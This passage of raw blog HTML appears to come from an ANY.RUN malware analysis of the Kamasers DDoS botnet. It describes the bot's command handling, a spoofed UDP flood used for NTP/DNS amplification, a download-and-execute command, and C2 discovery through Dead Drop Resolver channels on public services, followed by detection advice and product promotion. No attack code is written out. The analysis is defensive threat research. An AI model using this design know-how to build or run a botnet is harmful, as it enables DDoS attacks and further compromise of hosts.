https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2-740x401.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/kamasers_2.png 1822w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Query in&nbsp;ANY.RUN&nbsp;TI to search for the&nbsp;Kamasers&nbsp;malware family<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>By geographic distribution of observed submissions, the largest share comes from&nbsp;<strong>Germany<\/strong>&nbsp;and the&nbsp;<strong>United States<\/strong>, with separate cases also recorded in&nbsp;<strong>Poland<\/strong>&nbsp;and other countries. During the analysis, control commands in&nbsp;<strong>Spanish<\/strong>&nbsp;were also&nbsp;observed. This may indirectly suggest that the botnet may have originated from, or evolved within, a Spanish-speaking operator environment, although its actual activity is clearly international in scope.&nbsp;<\/p>\n\n\n\n<p>It is also important to consider that the botnet uses the infrastructure of infected hosts to carry out attacks. If corporate systems are compromised, the organization may not only become a potential target itself, but also inadvertently serve as a source of attacks against third parties. This creates reputational risks, the possibility of IP address blacklisting, and&nbsp;additional&nbsp;financial costs related to investigation and infrastructure recovery.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Technical&nbsp;Breakdown of&nbsp;Kamasers&nbsp;&nbsp;<\/h2>\n\n\n\n<p>To better understand the Kamasers botnet architecture, a detailed sample analysis was conducted. The starting point was the sample from this <a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>ANY.RUN sandbox<\/strong><\/a><strong> <\/strong>session:<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/04a02053-2d1a-44db-bbcb-ef03d66f941f?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Check analysis session<\/strong><\/a><strong><\/strong>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-1024x576.png\" alt=\"\" class=\"wp-image-19494\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-1024x576.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-768x432.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-1536x864.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-370x208.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers-740x416.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/sandbox_analysis_kamasers.png 1842w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s analysis session used as a starting point for technical investigation<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>This was followed by reverse engineering of the binary. The analysis focused primarily on how the malware receives and processes commands from the C2 server, as well as the attack capabilities implemented in the sample.&nbsp;<\/p>\n\n\n\n<p>After&nbsp;launch, the malware begins retrieving commands through a&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;mechanism. It uses public services such as&nbsp;<strong>GitHub Gist, Telegram, Dropbox, and Bitbucket<\/strong>&nbsp;as intermediary sources. From these sources, the bot extracts the address of the real C2 server and then&nbsp;establishes&nbsp;a connection to it.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"411\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2.png\" alt=\"The bot validates the format of the command sent by the C2 server\" class=\"wp-image-19475\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-300x137.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-768x350.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-370x169.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-270x123.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imageb-2-740x338.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>The bot&nbsp;validates&nbsp;the format of the command sent by the C2 server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Command processing takes place in several stages. First, the bot verifies that the command format is valid. All valid commands must begin with the \u201c!\u201d character. If this prefix is missing, the command is rejected and not executed.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"604\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2.png\" alt=\"Code for the handler caching mechanism\u00a0\" class=\"wp-image-19476\" style=\"width:516px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-300x201.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-768x515.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-370x248.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-270x181.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagec-2-740x496.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Code for the handler caching mechanism<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>After&nbsp;validating&nbsp;the prefix, the bot matches the command against an internal handler table. The analysis showed that&nbsp;Kamasers&nbsp;uses&nbsp;a&nbsp;<strong>handler caching mechanism<\/strong>. If the previously used handler matches the current command index, the bot takes a fast path without performing another&nbsp;lookup. Otherwise, it triggers the dynamic resolution routine.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"565\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1.png\" alt=\"Pseudocode of the flowchart showing command receipt and handler caching\" class=\"wp-image-19477\" style=\"width:584px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-300x188.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-768x482.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-370x232.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-270x169.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imaged-1-740x464.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Pseudocode of the flowchart showing command receipt and handler caching<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This mechanism can be briefly described as shown in the pseudocode above.&nbsp;<\/p>\n\n\n\n<p>One of the most illustrative commands is !udppro. It implements a high-speed UDP flood with support for source IP spoofing. Code analysis shows the standard sequence for creating a UDP socket via the&nbsp;<strong>WinSock API<\/strong>&nbsp;using the AF_INET, SOCK_DGRAM, and IPPROTO_UDP parameters.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"222\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1.png\" alt=\"Disassembled code for the \u201c!udppro\u201d command\u00a0\" class=\"wp-image-19478\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-300x74.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-768x189.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-370x91.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-270x67.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagee-1-740x182.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Disassembled code for the \u201c!udppro\u201d command<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>After initializing the socket, the malware configures the&nbsp;packet&nbsp;transmission parameters. Support for&nbsp;<strong>IP spoofing<\/strong>&nbsp;enables&nbsp;<strong>reflection<\/strong>&nbsp;and&nbsp;<strong>amplification<\/strong>&nbsp;attacks through public&nbsp;<strong>NTP<\/strong>&nbsp;and&nbsp;<strong>DNS<\/strong>&nbsp;servers. In such scenarios, the victim receives responses that are significantly larger than the original requests, leading to a sharp increase in load.&nbsp;&nbsp;<\/p>\n\n\n\n<p>The&nbsp;<em>!download&nbsp;<\/em>command is also present, implementing a&nbsp;<strong>Download &amp; Execute<\/strong>&nbsp;mechanism. The bot retrieves an executable file from the specified URL, checks for the MZ signature,&nbsp;allocates&nbsp;memory, maps the sections, and transfers execution to the entry point. If successful, it sends a task completion message; if an error occurs, it generates a failure notification.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"387\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1.png\" alt=\"Bot status messages related to the download process\u00a0\" class=\"wp-image-19479\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-300x129.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-768x330.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-370x159.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-270x116.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/imagef-1-740x318.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Bot status messages related to the download process<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">Implementation of Dead Drop Resolver&nbsp;Channels<\/h3>\n\n\n\n<p>Kamasers&nbsp;uses four&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;channels:&nbsp;<strong>GitHub Gist<\/strong>, a&nbsp;<strong>Telegram bot<\/strong>, a file hosted on&nbsp;<strong>Dropbox<\/strong>, and a&nbsp;<strong>Bitbucket<\/strong>&nbsp;repository. Importantly, links to these services are not stored in the sample in plain form. Instead, they are constructed and unpacked dynamically at runtime, which is why such strings do not appear during static analysis of the binary.&nbsp;<\/p>\n\n\n\n<p>The&nbsp;<strong>Dead Drop Resolver (DDR)<\/strong>&nbsp;mechanism serves as an intermediary layer between the bot and the primary C2 server. After&nbsp;launch, the malware sequentially sends HTTP GET requests to each of the public resources. The content hosted there&nbsp;contains&nbsp;the current address of the command-and-control server. Once a response is received, the bot extracts the C2 address and&nbsp;establishes&nbsp;a direct connection to continue receiving commands.&nbsp;<\/p>\n\n\n\n<p>If the first source returns a valid address, no further requests are made.&nbsp;If the connection fails or the response is invalid, the bot automatically falls back to the next channel:&nbsp;<strong>Telegram<\/strong>, then&nbsp;<strong>Dropbox<\/strong>, and finally&nbsp;<strong>Bitbucket<\/strong>.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"198\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10.png\" alt=\"DDR links in the\u00a0Kamasers\u00a0codebase\u00a0\" class=\"wp-image-19480\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-300x66.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-768x169.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-370x81.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-270x59.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image10-740x163.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>DDR links in the&nbsp;Kamasers&nbsp;codebase<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>All of&nbsp;these resources&nbsp;ultimately point&nbsp;to the same C2 infrastructure:&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"325\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11.png\" alt=\"GitHub Gist content used by\u00a0Kamasers\u00a0as DDR\u00a0\" class=\"wp-image-19481\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-300x108.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-768x277.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-370x133.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-270x97.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image11-740x267.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>GitHub Gist content used by&nbsp;Kamasers&nbsp;as DDR<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"159\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1.png\" alt=\"Bitbucket content used by Kamasers as DDR \" class=\"wp-image-19482\" style=\"width:440px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-300x53.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-768x136.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-370x65.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-270x48.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image12-1-740x131.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Bitbucket content used by&nbsp;Kamasers&nbsp;as DDR<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"901\" height=\"141\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13.png\" alt=\"Fallback domains used if the DDR links are unavailable\" class=\"wp-image-19483\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13.png 901w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-300x47.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-768x120.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-370x58.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-270x42.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image13-740x116.png 740w\" sizes=\"(max-width: 901px) 100vw, 901px\" \/><figcaption class=\"wp-element-caption\"><em>Fallback domains used if the DDR links are unavailable<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>If none of the&nbsp;<strong>DDR channels<\/strong>&nbsp;responds, the malware falls back to a built-in list of backup domains.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Catching&nbsp;Kamasers&nbsp;Early: A Practical Detection Approach&nbsp;<\/h2>\n\n\n\n<p>Kamasers&nbsp;shows how a single malware infection can quickly turn into a broader business problem. Beyond DDoS activity, the botnet can also download and execute&nbsp;additional&nbsp;payloads, increasing the risk of deeper compromise.&nbsp;<\/p>\n\n\n\n<p>For security teams, the challenge is not only spotting the malware&nbsp;itself but&nbsp;also understanding whether an infected host is being used for external attacks, communicating with resilient C2 infrastructure, or pulling in follow-on payloads.&nbsp;<\/p>\n\n\n\n<p>Early detection depends on moving quickly from suspicious network activity to confirmed malicious behavior.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">1. Monitoring: Spot Malicious Infrastructure and Unusual Network Behavior Early&nbsp;<\/h3>\n\n\n\n<p>Kamasers&nbsp;relies on external infrastructure to receive commands, retrieve C2 addresses, and in some cases download&nbsp;additional&nbsp;payloads. It also uses public services such as GitHub Gist, Telegram, Dropbox, Bitbucket, and even&nbsp;Etherscan&nbsp;as part of its Dead Drop Resolver logic.&nbsp;<\/p>\n\n\n\n<p>Monitoring for&nbsp;suspicious outbound connections, newly observed infrastructure, and repeated communication with known malicious hosting can help teams detect activity before the infection leads to larger operational impact.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"466\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-1024x466.png\" alt=\"Actionable IOCs delivered by TI\u00a0Feeds\u00a0to your existing stack\u00a0\" class=\"wp-image-19484\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-1024x466.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-300x136.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-768x349.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-370x168.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-270x123.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17-740x337.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/image17.png 1425w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Actionable IOCs delivered by TI&nbsp;Feeds&nbsp;to your existing stack<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>ANY.RUN\u2019s&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>&nbsp;help&nbsp;surface suspicious indicators early, giving SOC teams faster visibility into malicious domains, IPs, and infrastructure patterns linked to emerging threats.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">99% unique\n<\/span>threat data for your SOC <br>Catch attacks <span class=\"highlight\">early<\/span> to\u00a0protect your business &nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kamasers-technical-analysis&#038;utm_term=250326&#038;utm_content=linktotifeedslanding#contact-sales\" rel=\"noopener\" target=\"_blank\">\nIntegrate TI Feeds\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">2. Triage: Confirm Botnet Activity with Behavior-Based Analysis&nbsp;<\/h3>\n\n\n\n<p>With threats like&nbsp;Kamasers, static detection alone may not show the full risk. A suspicious file may appear inconclusive until its real behavior is&nbsp;observed&nbsp;during execution.&nbsp;<\/p>\n\n\n\n<p>Running the sample inside the&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN&nbsp;interactive&nbsp;sandbox<\/a>&nbsp;makes it possible to confirm the full execution flow, including:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>retrieval of C2 data through Dead Drop Resolver channels&nbsp;<\/li>\n\n\n\n<li>connection to the active command-and-control server&nbsp;<\/li>\n\n\n\n<li>receipt and execution of DDoS commands&nbsp;<\/li>\n\n\n\n<li>download-and-execute behavior through commands&nbsp;like&nbsp;!download&nbsp;or&nbsp;!descargar&nbsp;<\/li>\n\n\n\n<li>status reporting back to the C2 infrastructure&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"724\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-1024x724.png\" alt=\"\" class=\"wp-image-19485\" style=\"width:600px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-1024x724.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-300x212.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-768x543.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-1536x1086.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-370x261.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-270x191.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09-740x523.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-25-at-09.19.09.png 1548w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Relevant IOCs automatically gathered in one tab inside&nbsp;ANY.RUN&nbsp;sandbox<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>This helps teams quickly&nbsp;determine&nbsp;whether the malware is only&nbsp;participating&nbsp;in DDoS activity or whether it also creates risk of further payload delivery and deeper compromise.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">74% of Fortune 100 companies \n<\/span>rely on ANY.RUN <br>for earlier detection and <span class=\"highlight\">faster SOC<\/span> response \n&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=kamasers-technical-analysis&#038;utm_term=250326&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nPower your SOC now\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h3 class=\"wp-block-heading\">3. Threat Hunting: Pivot from One Sample to Related Infrastructure&nbsp;<\/h3>\n\n\n\n<p>Once&nbsp;Kamasers&nbsp;is confirmed, the next step is&nbsp;understanding&nbsp;how far the activity may extend.&nbsp;<\/p>\n\n\n\n<p>Using&nbsp;ANY.RUN\u2019s&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence&nbsp;Lookup<\/a>, teams can pivot from the&nbsp;initial&nbsp;sample to uncover related infrastructure, connected sessions, and recurring patterns across the broader campaign.&nbsp;<\/p>\n\n\n\n<p>This makes it possible to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>identify&nbsp;other samples tied to the&nbsp;Kamasers&nbsp;family&nbsp;<\/li>\n\n\n\n<li>trace infrastructure linked to the botnet\u2019s C2 activity&nbsp;<\/li>\n\n\n\n<li>investigate repeated use of ASN-linked hosting such as&nbsp;Railnet<\/li>\n\n\n\n<li>expand detection based on shared behavior and network indicators&nbsp;<\/li>\n<\/ul>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolookup#{%22query%22:%22threatName:%5C%22kamasers%5C%22%22,%22dateRange%22:30}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;kamasers&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"446\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png\" alt=\"\" class=\"wp-image-19465\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1024x446.png 1024w, 